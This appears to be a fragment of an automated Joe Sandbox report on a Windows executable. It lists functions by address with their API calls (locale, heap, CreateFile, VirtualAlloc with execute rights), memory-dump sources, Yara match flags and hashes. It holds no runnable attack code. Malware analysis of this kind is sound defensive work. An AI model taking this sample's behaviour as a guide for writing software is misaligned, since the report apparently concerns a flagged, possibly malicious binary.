                                                                                                                                                                                                                                  • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3585332825-0
                                                                                                                                                                                                                                  • Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A2FA Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                  • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A039 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 040CC995 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 040CC9E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: c9fd112eff7d30cf01973ff24189d0438d5dc46637376b9bc2f5ecbacc12e077
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB113C79A00208EFDB01DF98C989E9CBBF5AF08354F058094F948AB361D375EA50DF80
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0042099B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                  • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420063 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID: 0B$DCA
                                                                                                                                                                                                                                  • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004207C7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP$B
                                                                                                                                                                                                                                  • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: =CA${B
                                                                                                                                                                                                                                  • API String ID: 1084509184-2907596089
                                                                                                                                                                                                                                  • Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042044E Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204A2
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004204F3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205B3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2829624132-0
                                                                                                                                                                                                                                  • Opcode ID: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                  • Instruction ID: 67309229f61afd2ab5856e0fbe736b03e5ebd4e934039cb527c6d869dde023b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bde57abaed577afc3e8201a813a88051dff45bb3df8ea6fa306f0a34fcc62cce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0619F71A00127ABDB28DF25EC82BBB77E8EF44314F50406AED05C6682E778D995CF58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                  • Instruction ID: 06cd5aec9bbefeefa8a3bc7bad5d1bc59d982319078da622735b0081b3eb93c9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C03149B6900609DFDB10DF99C884AAEFBF5FF48324F14408AD841A7210E775FA45CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041D9E1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                  • Opcode ID: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                  • Instruction ID: 5858c32c973f9b028c51109d6fdea45301b38e121b5e506b78abc6587599c678
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb517d5a815ffc9819fbc41a8d1b52c99bc6f3e39d79201209cac43163c2d673
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A43124B1D04208AFCB24CE79CC84EEB7BBDDF85354F0401AEF41997252E6389D858B54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004203C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0042069E,00000001,?,?,=CA,?,00420A3F,=CA,?,?,?,?,?,0041433D,?,?), ref: 0042040D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
